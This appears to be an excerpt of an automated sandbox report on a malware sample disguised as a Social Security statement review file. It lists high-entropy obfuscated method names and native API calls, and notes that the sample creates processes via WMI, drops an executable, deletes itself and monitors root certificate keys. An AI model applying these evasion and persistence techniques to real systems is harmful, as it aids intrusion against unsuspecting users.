              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 16_2_00007FF887C18150 push ebx; ret 16_2_00007FF887C1816A
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6fac0000.12.raw.unpack, dtiuax3aL6HY5hTsBNb.csHigh entropy of concatenated method names: 'CvX3xemMWQ', 'cxf77BB7X1K5ibgc7Zo', 'ceT4U4BV50W3eHq8NrF', 'DssNhUBvLb7V1YR9Fbt', 'Q6CNlvBFZJHVxCkoUgm', 'JCoyPNBQY5Dqq1tfW5m', 'JRuB5VBs5hEAxyZYG4X', 'PruiC6BSyrZpb3GAw3d'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6fac0000.12.raw.unpack, myqOgNqHUh08P1BLL8y.csHigh entropy of concatenated method names: 'FXwqR34xMV', 'dSnXmFL1m9hQXUmSSts', 'WEfw4cL0ej61fuOv3OJ', 'OGeJ6mLFEBP5mq9cA6n', 'dxJk2cLQ1be00t3MDeu', 'Bs8WdlLfuSSsVfBKhNc', 'ydT10ILgUbUfF7ZmVbi'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6fac0000.12.raw.unpack, c6vto83ClP6qSp7PgXI.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'u7p3ZnDEH5', 'NtProtectVirtualMemory', 'm46x8dBN4bQY6kK89vx', 'VTWujUBTCleJObRNWp1', 'WsW5KbBKthsI6jNalRW', 'NKKEwVBhXyb4KgPcwpm'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, hFS0eacTyQe6YQgZaR.csHigh entropy of concatenated method names: 'jdRABwDK1', 'KJx5LcvhF', 'GB8Cp7ukl', 'nVgeuRcaa', 'DdcGj3569', 'wdxTaROfV8GccxTZjMj', 'FOYlT0OgcuSDU3FkmZ4', 'goFGSXO1ptdlWHYPMVT', 'zf2jXpOsP8RfLcuXCCU', 'yeQHAPOSqSmuTDLUmZ3'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'HKhRjGhIh4mtGcu6gvc'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, IvRindpyPTM887oxi2.csHigh entropy of concatenated method names: 'NxFJ62BKr', 'sGca8C73i', 'EH5nDijDg', 'emjO0shep', 'Y7klmcO7aDm3g5Yedbu', 'Wd1JCkOV0AgdpuJnbRy', 'q93RUVOvpcIjtLr2UZG', 'wQ8mhZOk4WjbHoT3DVA', 'sAFQcGOPSQ3rTm61tWG', 'vNAoU0OyaNCfhhDVXJe'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, dtiuax3aL6HY5hTsBNb.csHigh entropy of concatenated method names: 'CvX3xemMWQ', 'cxf77BB7X1K5ibgc7Zo', 'ceT4U4BV50W3eHq8NrF', 'DssNhUBvLb7V1YR9Fbt', 'Q6CNlvBFZJHVxCkoUgm', 'JCoyPNBQY5Dqq1tfW5m', 'JRuB5VBs5hEAxyZYG4X', 'PruiC6BSyrZpb3GAw3d'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, Q13OxRoDpqHT7OZ5ir2.csHigh entropy of concatenated method names: 'KAroE5mSgr', 'euaobD6yVQ', 'oWQo9v1s0n', 'T3posYVgXe', 'U34oSxmwVu', 'EheofWE6B7', 'A8CogwBx8h', 'cNIo19leHg', 'dgWo0LN79c', 'h4IoF4MNW8'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, w7icNbYYgdXcSbGxZ82.csHigh entropy of concatenated method names: 'K8lYotgQ2n', 'SafYcj3REd', 'tJlDcqKbaeMN1qkFgrq', 'vJ0clhK9a9aGrNHFJ3H', 'liy9h0KslNgad5pT2Fv', 'ovNgPrKW7MnOTIJ98pF', 'kxEtoOKELBGW4EiZ9Dt', 'X5KjvBKSbDmPF22EhxL', 'jyw1QxKfelkQ0prhy3a', 'qFF6j4Kgs1cwy9NJdUv'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, oDmwayYLiGBjuEoNNmf.csHigh entropy of concatenated method names: 'gkibnaNH5HnmgJlaoi1', 'DlCLXYNp7REnjIlQxvP', 'Ox1owweNNj', 'nZr16YNOS92nIJVN8NF', 'OKp911Nn0NobwF95X0a', 'RWQT6gNLXY1wgaSJggC', 'WtTprBNDYMfP5dvH0cf', 'HPIABENBWtBXeKjhGsT', 'c9FNrANlRYXO29jtmIU', 'FYnC2eNxA8KQL1TYVdh'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, eBBfMXqJimdeJiAgJHJ.csHigh entropy of concatenated method names: 'IRGqOwZgV3', 'Hcdqn51gYp', 'lo2qLWO718', 'sRCqDifwXY', 'jbyqBeHg5P', 'LcLuHPLkTZ1DxmH6Nm2', 'Go9VjQLPIB3OoYrg3v6', 'pMiAmwLy4LCyZKtjvCv', 'BxxboYLiLpMhJ7dICc9', 'yVukaDLzQi7aVfy3KXK'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, Pqt1LbY5i7h7xP8ekQA.csHigh entropy of concatenated method names: 'H1VYCadqSH', 'XYGYerQxHb', 'gNHkhQhoJE6ST36A3FA', 'f0H2MWhcugtSPOT2qXO', 'ESJOEthr9JSXRnSBPtH', 'qaWSgnhYRwG281Yo863', 'dTa4vIh6m9Na0DI7o9H', 'jf0hLwhGXRABZsYAvZ8', 'QyABMihA7vOs693livm', 'QC6Lnyh5CNtiIKf8M9O'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, eZ0jeXqlG4gJ8ZwvmoG.csHigh entropy of concatenated method names: 'T4dqKmT6rb', 'l2WqhmabWT', 'lggqN9ju2e', 'J3VTf7DNKF562rFUTXP', 'yLhSE8DT2hdr1EOuIxL', 'wd3vetDIpIJH5LcSEGB', 'SN7RC3DmZI3BU0V1v9u', 'YPVXUoD8rQrn6AEFkHd', 'nlI1oBDW64yjxn2m1lD', 'WphZjhDEcgXf6KlfZq2'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, E2Y3sN3Xm5TTDuqh1ha.csHigh entropy of concatenated method names: 'Avt3jYcnmq', 'MqX3qRDdrZ', 'Xm034FTcmq', 'UdG3dlv5I6', 'PMj3Y6Phpi', 'PlY36IWNrl', 'Oxu3owqhYZ', 'awG3coSWLq', 'ayI3rSiy3n', 'Ltn3Gr4u8G'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, YiU745YZxGGTBCk9Vsh.csHigh entropy of concatenated method names: 'X4XYHY0J5I', 'WxtfgKhZdNq4XjSrBJS', 'uNNQbShtBWrQ4Jy8y7c', 'ojMXkrhHrV3qtLsxEo8', 'k3o2CQhpj73EZPnC5xb', 'ynJKjShRvKZgWQT8KOc', 'RRAgtXhCguejUARP2P3', 'eubAr5hennd6sxHx3lp'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, evGsWSYJLmpIa7i7eLy.csHigh entropy of concatenated method names: 'yeqbIm28TI', 'IoqW6mNcT1oa8KfJZOf', 'WxrNPWNrZ37FwQssV91', 'wQxROTNGQmlR9mEPaZP', 'vW9D0WNAxla4EO24pYP', 'vo3504N6W6RlYq79niq', 'm3cMlvNoj6k5FqCmPHN', 'pBJ7mKN5hJDgF6lnbfk', 'QcU47FNuL5JuWEDo1PV'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, dCaufKYrosI7qZ8JqRO.csHigh entropy of concatenated method names: 'c0eYABc7ZD', 'qVASaihXaga6ig0voji', 'aFohY2hMKCV9OMb4AQ4', 'dvBSGVhjYYSfYJGJJcP', 'OB17GuhwCfulh528ji3', 'aMJfyWhq3cxw6wnYm56', 'UKbckyh3feQ4Z2Cgfyl', 'nBwelIh4FJyiL7hQ090', 'iKgUW5hU72OCbX969dJ', 'wuXVhkKzHmalmQTL4Y3'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, myqOgNqHUh08P1BLL8y.csHigh entropy of concatenated method names: 'FXwqR34xMV', 'dSnXmFL1m9hQXUmSSts', 'WEfw4cL0ej61fuOv3OJ', 'OGeJ6mLFEBP5mq9cA6n', 'dxJk2cLQ1be00t3MDeu', 'Bs8WdlLfuSSsVfBKhNc', 'ydT10ILgUbUfF7ZmVbi'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, m3ZCvKq85JoKVuUJoCJ.csHigh entropy of concatenated method names: 'CcWqEE296V', 'ATygUsDQP2jYBEf9OIZ', 'L8FPqmD7ORheq274lCx', 'WaPdNJDV8iH11ehaxmt', 'NWuDv3D0P5LC5Cam2Nd', 'BIoovjDFtgA90afFKqp'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, vyVIsldamjieYiDYWFX.csHigh entropy of concatenated method names: 'AM6dnWWOMV', 'WFfdLOL4LW', 'ecDm9xxw7mEQg833kni', 'DYh8ETxqWDwcgRJIS1k', 'ScCIc7x37M65G16bRSC', 'OJNELdx4bF2Argj3I4L', 'pg9Nk1xUAxKHNke6VJe', 'XAkOOqxdNH1XjIwYWtI', 'AD4EB9xYwAdToTJf72M', 'vef2vBx6lPwKPhgK5kH'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, k6r0oGdWSKOZD1CRl9a.csHigh entropy of concatenated method names: 'NmpdbGiKaI', 'pJZDFFxFBwvpTxeZaQQ', 'qgjwb1xQHsgICujNv0l', 'PgHnOBx7E6yUcgX4Nq1', 'nXO0alxVfQbcP1p6sdf', 'tTkBelxvhaJFNMd9dF8', 'A7F8vUxkRbGFA2sWmTw', 'dYGaVJxPrAvlvcHJQGJ', 'Efu1kQxydJjd12FrsaW', 'fUMMUFxim083gvUbHd9'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, RXuAu4MufUbGeGYlNn9.csHigh entropy of concatenated method names: 'g47Mekd0tw', 'dZOqRjnDb4F19wQspto', 'AiBcPrnBtslWlOVPpPC', 'YJorOJnlblbVcC0wVhV', 'luPlhunxE6EHhVEOneN', 'rJ4FA5nKu1e3J4CcV1f', 'emdPOTnhYdNEMlPZ6tQ', 'GpjpsNnNjx2YlgkdoQp', 'zePjlinTIivBgJxqPSJ', 'Aehe0qnI5Z83epmA7h7'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, BW3XJKdDavwRcZ6VTq1.csHigh entropy of concatenated method names: 'T1Cdl2Pgdn', 'hjgXDBxxRsVnohHCIJQ', 'IOQ294xKwNkc60V4lIu', 'cs7n4BxhYpqlAuGaXcC', 'DSX6agxNetQiaTdx0QK', 'roxcaPxTadNoRZHn1f8', 'uTH6o2xIchNnr5XLuRB', 'R5COcVxB2vSaKq25eJp', 'StCJu3xl6YPEKA0RoPi'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, BLtafFd0NvLGPmxFYq2.csHigh entropy of concatenated method names: 'vMrdQr3XIU', 'IS7dVD6x8E', 'EvHd7Ve8Et', 'bLkK12KAuHgSASAa488', 'ES8drdK5In3wmKarImC', 'rRaGMVKrAbA1UICWQda', 'A6lLPXKGplTRLErVUBY', 'pCnijsKuihv4pRFZ8JV', 'zS9ZPkKCOf4fhVsioXe', 'PIJqYCKedxmtIlU12Nh'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, c6vto83ClP6qSp7PgXI.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'u7p3ZnDEH5', 'NtProtectVirtualMemory', 'm46x8dBN4bQY6kK89vx', 'VTWujUBTCleJObRNWp1', 'WsW5KbBKthsI6jNalRW', 'NKKEwVBhXyb4KgPcwpm'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, AdoJqyqCBn0hEFfj4Oo.csHigh entropy of concatenated method names: 'zTEqZiw0gI', 'HnPqt5Maen', 'MfrMJfL8IjBiB9LR79V', 'HhmTpwLI5CYE8uFem7i', 'fgo0MVLm0MIwdvGAF0E', 'vKubkMLWMkMnr0qBDqC', 'ik5ltuLEosb6xqarapu', 'kr4YTjLbJ4bq55IhAlK', 'eMOIR5L9EFrxs0YclB4', 'GII1UTLsRyuFbjStg53'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, rBWXUKdxK0mCkvENpQo.csHigh entropy of concatenated method names: 'SXkdTrfS79', 'beOdIpiRAU', 'G3ldhwalmB', 'zAidNRevxy', 'fIapptxEMaMCnPo5b66', 'bIvWaNxbKGaqwv0o4Zc', 'AIZW5ix9bKgARTgwbS3', 'kqfL51xs5B73kdTFseJ', 'ULTewIx8l6EC1FIGjfs', 'e4c4SIxW99GG6KEWmyr'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, EJsVbkdfNRGaHWOyq0X.csHigh entropy of concatenated method names: 'm3Wd1WBE7M', 'OEtyUmK3Vs6NmcCDqwS', 'W93ljIK43OYgC9MLURG', 'FHQ1FQKUYQuD5yJEPLP', 'okIACTKdLYEaoVtt0o5', 'lSOlIhKY027Sk0twAbO', 'qIWxYyK6foQeVXkiAk0', 'BCNUkIKoIZExWt8a9Ft', 'jdcmMZKw1s5RMtWfN69', 'XjKZ9PKqbTMT8ikw0p5'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, RvIDdloQQOHNGgDdZn6.csHigh entropy of concatenated method names: 'cqQCuLduxV', 'sx9CCXDu73', 'wElCeaA9y5', 'eZTCZNKZZm', 'XHQCtQPtl2', 'bOdCHhf0kO', 'UhRCpHSvg0', 'NkBc58cTfT', 'VX3CR8qy6Z', 'dajCJ3U3WJ'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, z6aqyHYMKLWCWgVlqPF.csHigh entropy of concatenated method names: 'IGAYwel94y', 'bvPa3gKDHvuo221dQWB', 'iHH21nKBHuDt3fdwMOg', 'xDjA71KlIylB082Ccmm', 'AiJpTsKxj2L9nEPTpB7', 'GP8hvkKnixFESIRhIRx', 'noD9xNKLfSXXsxMsJj7'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, hFS0eacTyQe6YQgZaR.csHigh entropy of concatenated method names: 'jdRABwDK1', 'KJx5LcvhF', 'GB8Cp7ukl', 'nVgeuRcaa', 'DdcGj3569', 'wdxTaROfV8GccxTZjMj', 'FOYlT0OgcuSDU3FkmZ4', 'goFGSXO1ptdlWHYPMVT', 'zf2jXpOsP8RfLcuXCCU', 'yeQHAPOSqSmuTDLUmZ3'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'HKhRjGhIh4mtGcu6gvc'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, IvRindpyPTM887oxi2.csHigh entropy of concatenated method names: 'NxFJ62BKr', 'sGca8C73i', 'EH5nDijDg', 'emjO0shep', 'Y7klmcO7aDm3g5Yedbu', 'Wd1JCkOV0AgdpuJnbRy', 'q93RUVOvpcIjtLr2UZG', 'wQ8mhZOk4WjbHoT3DVA', 'sAFQcGOPSQ3rTm61tWG', 'vNAoU0OyaNCfhhDVXJe'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, dtiuax3aL6HY5hTsBNb.csHigh entropy of concatenated method names: 'CvX3xemMWQ', 'cxf77BB7X1K5ibgc7Zo', 'ceT4U4BV50W3eHq8NrF', 'DssNhUBvLb7V1YR9Fbt', 'Q6CNlvBFZJHVxCkoUgm', 'JCoyPNBQY5Dqq1tfW5m', 'JRuB5VBs5hEAxyZYG4X', 'PruiC6BSyrZpb3GAw3d'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, Q13OxRoDpqHT7OZ5ir2.csHigh entropy of concatenated method names: 'KAroE5mSgr', 'euaobD6yVQ', 'oWQo9v1s0n', 'T3posYVgXe', 'U34oSxmwVu', 'EheofWE6B7', 'A8CogwBx8h', 'cNIo19leHg', 'dgWo0LN79c', 'h4IoF4MNW8'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, w7icNbYYgdXcSbGxZ82.csHigh entropy of concatenated method names: 'K8lYotgQ2n', 'SafYcj3REd', 'tJlDcqKbaeMN1qkFgrq', 'vJ0clhK9a9aGrNHFJ3H', 'liy9h0KslNgad5pT2Fv', 'ovNgPrKW7MnOTIJ98pF', 'kxEtoOKELBGW4EiZ9Dt', 'X5KjvBKSbDmPF22EhxL', 'jyw1QxKfelkQ0prhy3a', 'qFF6j4Kgs1cwy9NJdUv'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, oDmwayYLiGBjuEoNNmf.csHigh entropy of concatenated method names: 'gkibnaNH5HnmgJlaoi1', 'DlCLXYNp7REnjIlQxvP', 'Ox1owweNNj', 'nZr16YNOS92nIJVN8NF', 'OKp911Nn0NobwF95X0a', 'RWQT6gNLXY1wgaSJggC', 'WtTprBNDYMfP5dvH0cf', 'HPIABENBWtBXeKjhGsT', 'c9FNrANlRYXO29jtmIU', 'FYnC2eNxA8KQL1TYVdh'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, eBBfMXqJimdeJiAgJHJ.csHigh entropy of concatenated method names: 'IRGqOwZgV3', 'Hcdqn51gYp', 'lo2qLWO718', 'sRCqDifwXY', 'jbyqBeHg5P', 'LcLuHPLkTZ1DxmH6Nm2', 'Go9VjQLPIB3OoYrg3v6', 'pMiAmwLy4LCyZKtjvCv', 'BxxboYLiLpMhJ7dICc9', 'yVukaDLzQi7aVfy3KXK'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, Pqt1LbY5i7h7xP8ekQA.csHigh entropy of concatenated method names: 'H1VYCadqSH', 'XYGYerQxHb', 'gNHkhQhoJE6ST36A3FA', 'f0H2MWhcugtSPOT2qXO', 'ESJOEthr9JSXRnSBPtH', 'qaWSgnhYRwG281Yo863', 'dTa4vIh6m9Na0DI7o9H', 'jf0hLwhGXRABZsYAvZ8', 'QyABMihA7vOs693livm', 'QC6Lnyh5CNtiIKf8M9O'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, eZ0jeXqlG4gJ8ZwvmoG.csHigh entropy of concatenated method names: 'T4dqKmT6rb', 'l2WqhmabWT', 'lggqN9ju2e', 'J3VTf7DNKF562rFUTXP', 'yLhSE8DT2hdr1EOuIxL', 'wd3vetDIpIJH5LcSEGB', 'SN7RC3DmZI3BU0V1v9u', 'YPVXUoD8rQrn6AEFkHd', 'nlI1oBDW64yjxn2m1lD', 'WphZjhDEcgXf6KlfZq2'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, E2Y3sN3Xm5TTDuqh1ha.csHigh entropy of concatenated method names: 'Avt3jYcnmq', 'MqX3qRDdrZ', 'Xm034FTcmq', 'UdG3dlv5I6', 'PMj3Y6Phpi', 'PlY36IWNrl', 'Oxu3owqhYZ', 'awG3coSWLq', 'ayI3rSiy3n', 'Ltn3Gr4u8G'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, YiU745YZxGGTBCk9Vsh.csHigh entropy of concatenated method names: 'X4XYHY0J5I', 'WxtfgKhZdNq4XjSrBJS', 'uNNQbShtBWrQ4Jy8y7c', 'ojMXkrhHrV3qtLsxEo8', 'k3o2CQhpj73EZPnC5xb', 'ynJKjShRvKZgWQT8KOc', 'RRAgtXhCguejUARP2P3', 'eubAr5hennd6sxHx3lp'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, evGsWSYJLmpIa7i7eLy.csHigh entropy of concatenated method names: 'yeqbIm28TI', 'IoqW6mNcT1oa8KfJZOf', 'WxrNPWNrZ37FwQssV91', 'wQxROTNGQmlR9mEPaZP', 'vW9D0WNAxla4EO24pYP', 'vo3504N6W6RlYq79niq', 'm3cMlvNoj6k5FqCmPHN', 'pBJ7mKN5hJDgF6lnbfk', 'QcU47FNuL5JuWEDo1PV'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, dCaufKYrosI7qZ8JqRO.csHigh entropy of concatenated method names: 'c0eYABc7ZD', 'qVASaihXaga6ig0voji', 'aFohY2hMKCV9OMb4AQ4', 'dvBSGVhjYYSfYJGJJcP', 'OB17GuhwCfulh528ji3', 'aMJfyWhq3cxw6wnYm56', 'UKbckyh3feQ4Z2Cgfyl', 'nBwelIh4FJyiL7hQ090', 'iKgUW5hU72OCbX969dJ', 'wuXVhkKzHmalmQTL4Y3'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, myqOgNqHUh08P1BLL8y.csHigh entropy of concatenated method names: 'FXwqR34xMV', 'dSnXmFL1m9hQXUmSSts', 'WEfw4cL0ej61fuOv3OJ', 'OGeJ6mLFEBP5mq9cA6n', 'dxJk2cLQ1be00t3MDeu', 'Bs8WdlLfuSSsVfBKhNc', 'ydT10ILgUbUfF7ZmVbi'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, m3ZCvKq85JoKVuUJoCJ.csHigh entropy of concatenated method names: 'CcWqEE296V', 'ATygUsDQP2jYBEf9OIZ', 'L8FPqmD7ORheq274lCx', 'WaPdNJDV8iH11ehaxmt', 'NWuDv3D0P5LC5Cam2Nd', 'BIoovjDFtgA90afFKqp'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, vyVIsldamjieYiDYWFX.csHigh entropy of concatenated method names: 'AM6dnWWOMV', 'WFfdLOL4LW', 'ecDm9xxw7mEQg833kni', 'DYh8ETxqWDwcgRJIS1k', 'ScCIc7x37M65G16bRSC', 'OJNELdx4bF2Argj3I4L', 'pg9Nk1xUAxKHNke6VJe', 'XAkOOqxdNH1XjIwYWtI', 'AD4EB9xYwAdToTJf72M', 'vef2vBx6lPwKPhgK5kH'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, k6r0oGdWSKOZD1CRl9a.csHigh entropy of concatenated method names: 'NmpdbGiKaI', 'pJZDFFxFBwvpTxeZaQQ', 'qgjwb1xQHsgICujNv0l', 'PgHnOBx7E6yUcgX4Nq1', 'nXO0alxVfQbcP1p6sdf', 'tTkBelxvhaJFNMd9dF8', 'A7F8vUxkRbGFA2sWmTw', 'dYGaVJxPrAvlvcHJQGJ', 'Efu1kQxydJjd12FrsaW', 'fUMMUFxim083gvUbHd9'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, RXuAu4MufUbGeGYlNn9.csHigh entropy of concatenated method names: 'g47Mekd0tw', 'dZOqRjnDb4F19wQspto', 'AiBcPrnBtslWlOVPpPC', 'YJorOJnlblbVcC0wVhV', 'luPlhunxE6EHhVEOneN', 'rJ4FA5nKu1e3J4CcV1f', 'emdPOTnhYdNEMlPZ6tQ', 'GpjpsNnNjx2YlgkdoQp', 'zePjlinTIivBgJxqPSJ', 'Aehe0qnI5Z83epmA7h7'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, BW3XJKdDavwRcZ6VTq1.csHigh entropy of concatenated method names: 'T1Cdl2Pgdn', 'hjgXDBxxRsVnohHCIJQ', 'IOQ294xKwNkc60V4lIu', 'cs7n4BxhYpqlAuGaXcC', 'DSX6agxNetQiaTdx0QK', 'roxcaPxTadNoRZHn1f8', 'uTH6o2xIchNnr5XLuRB', 'R5COcVxB2vSaKq25eJp', 'StCJu3xl6YPEKA0RoPi'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, BLtafFd0NvLGPmxFYq2.csHigh entropy of concatenated method names: 'vMrdQr3XIU', 'IS7dVD6x8E', 'EvHd7Ve8Et', 'bLkK12KAuHgSASAa488', 'ES8drdK5In3wmKarImC', 'rRaGMVKrAbA1UICWQda', 'A6lLPXKGplTRLErVUBY', 'pCnijsKuihv4pRFZ8JV', 'zS9ZPkKCOf4fhVsioXe', 'PIJqYCKedxmtIlU12Nh'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, c6vto83ClP6qSp7PgXI.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'u7p3ZnDEH5', 'NtProtectVirtualMemory', 'm46x8dBN4bQY6kK89vx', 'VTWujUBTCleJObRNWp1', 'WsW5KbBKthsI6jNalRW', 'NKKEwVBhXyb4KgPcwpm'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, AdoJqyqCBn0hEFfj4Oo.csHigh entropy of concatenated method names: 'zTEqZiw0gI', 'HnPqt5Maen', 'MfrMJfL8IjBiB9LR79V', 'HhmTpwLI5CYE8uFem7i', 'fgo0MVLm0MIwdvGAF0E', 'vKubkMLWMkMnr0qBDqC', 'ik5ltuLEosb6xqarapu', 'kr4YTjLbJ4bq55IhAlK', 'eMOIR5L9EFrxs0YclB4', 'GII1UTLsRyuFbjStg53'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, rBWXUKdxK0mCkvENpQo.csHigh entropy of concatenated method names: 'SXkdTrfS79', 'beOdIpiRAU', 'G3ldhwalmB', 'zAidNRevxy', 'fIapptxEMaMCnPo5b66', 'bIvWaNxbKGaqwv0o4Zc', 'AIZW5ix9bKgARTgwbS3', 'kqfL51xs5B73kdTFseJ', 'ULTewIx8l6EC1FIGjfs', 'e4c4SIxW99GG6KEWmyr'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, EJsVbkdfNRGaHWOyq0X.csHigh entropy of concatenated method names: 'm3Wd1WBE7M', 'OEtyUmK3Vs6NmcCDqwS', 'W93ljIK43OYgC9MLURG', 'FHQ1FQKUYQuD5yJEPLP', 'okIACTKdLYEaoVtt0o5', 'lSOlIhKY027Sk0twAbO', 'qIWxYyK6foQeVXkiAk0', 'BCNUkIKoIZExWt8a9Ft', 'jdcmMZKw1s5RMtWfN69', 'XjKZ9PKqbTMT8ikw0p5'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, RvIDdloQQOHNGgDdZn6.csHigh entropy of concatenated method names: 'cqQCuLduxV', 'sx9CCXDu73', 'wElCeaA9y5', 'eZTCZNKZZm', 'XHQCtQPtl2', 'bOdCHhf0kO', 'UhRCpHSvg0', 'NkBc58cTfT', 'VX3CR8qy6Z', 'dajCJ3U3WJ'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, z6aqyHYMKLWCWgVlqPF.csHigh entropy of concatenated method names: 'IGAYwel94y', 'bvPa3gKDHvuo221dQWB', 'iHH21nKBHuDt3fdwMOg', 'xDjA71KlIylB082Ccmm', 'AiJpTsKxj2L9nEPTpB7', 'GP8hvkKnixFESIRhIRx', 'noD9xNKLfSXXsxMsJj7'

              Persistence and Installation Behavior

              barindex
              Creates processes via WMI
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Deletes itself after installation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: c:\users\user\desktop\social_security_statement_review.vbsJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
